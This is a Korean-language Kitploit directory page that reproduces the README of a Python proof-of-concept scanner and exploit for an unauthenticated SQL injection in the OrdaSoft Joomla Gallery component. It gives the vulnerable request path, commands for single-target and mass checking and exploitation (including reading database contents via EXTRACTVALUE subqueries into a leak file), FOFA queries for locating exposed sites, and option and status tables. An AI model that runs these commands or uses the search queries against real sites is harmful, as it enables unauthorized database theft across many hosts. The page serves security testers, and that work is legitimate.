Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-88854 — Python 3 PoC 스캐너 및 CVE-2026-88854 익스플로잇으로, OrdaSoft Joomla Gallery의 인증되지 않은 SQL 인젝션을 대상으로 하며 대량 검사 및 EXTRACTVALUE 데이터 읽기 모드를 제공합니다. | Kitploit
도구/GitHubGitHub/murrez/cve-2026-88854
ReconnaissanceVulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmurrez/cve-2026-88854

CVE-2026-88854

Python 3 PoC 스캐너 및 CVE-2026-88854 익스플로잇으로, OrdaSoft Joomla Gallery의 인증되지 않은 SQL 인젝션을 대상으로 하며 대량 검사 및 EXTRACTVALUE 데이터 읽기 모드를 제공합니다.

저장소 보기
31일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-88854 — OrdaSoft Joomla Gallery SQL 인젝션

Joomla용 OrdaSoft OS Responsive Image Gallery의 **CVE-2026-88854**에 대한 Python 3 PoC 스캐너/익스플로잇.

구성 요소com_osgallery, com_osgallery_light
영향 받는 버전1.0.0 – 6.2.6
수정된 버전6.2.7+
CVSS 4.09.3 (치명적)
인증없음 (공개 mod_osgallery_search)
CWECWE-89

요약

showSearchResult() / showSearchResultAjax()는 $input->getVar()를 통해 textsearch / searchText를 읽으며, 이는 적절한 SQL 이스케이프를 적용하지 않습니다. 해당 값은 LIKE 절에 연결됩니다. 인증되지 않은 방문자는 UNION 스타일 인젝션을 사용하여 데이터베이스 내용을 읽을 수 있습니다.

일반적인 요청 표면:

root@kitploit:~
GET /index.php?option=com_osgallery&task=showSearchResultAjax&format=raw&textsearch=...

레거시 설치에서는 작업 이름 searhResult(오타)를 사용할 수 있습니다.

요구 사항

  • Python 3.9+
  • pip install -r requirements.txt

사용법

root@kitploit:~
pip install -r requirements.txt

# Fingerprint + strict SQLi probe (error / time / EXTRACTVALUE)
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# MySQL error-based read (default subquery: VERSION())
python poc.py -u https://target.example --mode exploit

python poc.py -u https://target.example --mode exploit \
  --subquery "SELECT DATABASE()"

# Mass exploit (writes leaks to exploited.txt, not hits.txt)
python poc.py --list targets.example.txt --mode exploit --threads 5 --quiet \
  --output exploit_results.jsonl --vuln-list exploited.txt

# Re-tier a prior mass check by manifest version (optional)
python audit_scan.py --jsonl cve_2026_88854_results.jsonl

CLI 옵션

출력 (대량 검사)

파일내용
cve_2026_88854_results.jsonl대상별 JSON
hits.txt후보 URL (exploitable_candidate)

일반적인 status 값 (check)

스캔 후 감사 (audit_scan.py)

대량 check 후 audit_scan.py를 실행하여 관리자 매니페스트를 다시 가져오고 대상을 분류합니다:

갤러리 버전은 Joomla extension version= 속성이 아니라 administrator/components/com_osgallery/osgallery.xml의 <version> 요소에서 읽습니다.

제한 사항

  • Exploit 모드는 MySQL 오류 기반 EXTRACTVALUE를 사용합니다; MariaDB/Postgres, 오류 비활성화 또는 WAF는 CVE가 적용되더라도 유출이 없을 수 있습니다.
  • 부울 길이 차이만으로는 확인된 SQLi로 간주되지 않습니다 (테스트에서 ModSecurity 406이 오탐을 유발했습니다).
  • 매니페스트 버전 ≤ 6.2.6은 노출 기간을 나타내며, 모든 호스트에서 익스플로잇 가능한 SQLi를 보장하지 않습니다.
  • 하위 디렉터리 Joomla 설치는 올바른 기본 URL이 필요합니다 (예: https://host/site).

FOFA / 탐지 힌트

root@kitploit:~
app="Joomla" && body="com_osgallery"
body="/images/com_osgallery/"

저장소 구조

root@kitploit:~
.
├── poc.py
├── audit_scan.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

로컬 대상 목록 및 실행 산출물(list.txt, fofa*.csv, *.jsonl, hits*.txt, …)은 .gitignore에 있으며 커밋해서는 안 됩니다.

참고 자료

  • NVD — CVE-2026-88854
  • OrdaSoft Joomla Gallery

법적 고지

승인된 보안 테스트 전용입니다. 관련 법률 및 프로그램 규칙을 준수할 책임은 사용자에게 있습니다.

도구 다운로드
옵션설명
-u, --url단일 대상 기본 URL (하위 디렉터리 설치: 경로 포함)
--list대상 목록 파일 (한 줄에 URL 하나)
--modecheck 또는 exploit
--subqueryEXTRACTVALUE 내부의 SQL (익스플로잇 모드, 기본값 SELECT VERSION())
--threads, -j대량 동시성 (기본값 20)
--timeoutHTTP 타임아웃 초 (기본값 20)
--proxyHTTP(S) 프록시 URL
--outputJSONL 결과 (기본값 cve_2026_88854_results.jsonl)
--vuln-listcheck → hits.txt; exploit → exploited.txt
--quiet, -q진행 출력 최소화
상태의미
sqli_confirmed오류/시간 기반 SQLi 또는 검증된 EXTRACTVALUE 유출
likely_vulnerable_version매니페스트 버전 ≤ 6.2.6 + 검색 엔드포인트
likely_component갤러리 감지됨, 버전 알 수 없음
boolean_inconclusive응답 길이 차이만 존재 (종종 WAF); 확인된 것으로 간주되지 않음
patched_version매니페스트 버전 > 6.2.6
component_no_search_endpoint구성 요소 존재, 검색 작업에 도달할 수 없음
no_componentcom_osgallery 감지되지 않음
파일내용
hits_version_lte_626.txt매니페스트 갤러리 버전 ≤ 6.2.6
hits_component_endpoint.txt갤러리 + 엔드포인트, 버전 읽을 수 없음
hits_patched.txt매니페스트 > 6.2.6
fofa_stale.txt구성 요소 없음 (오래된 FOFA 행)
cve_2026_88854_audit.jsonl보강된 JSONL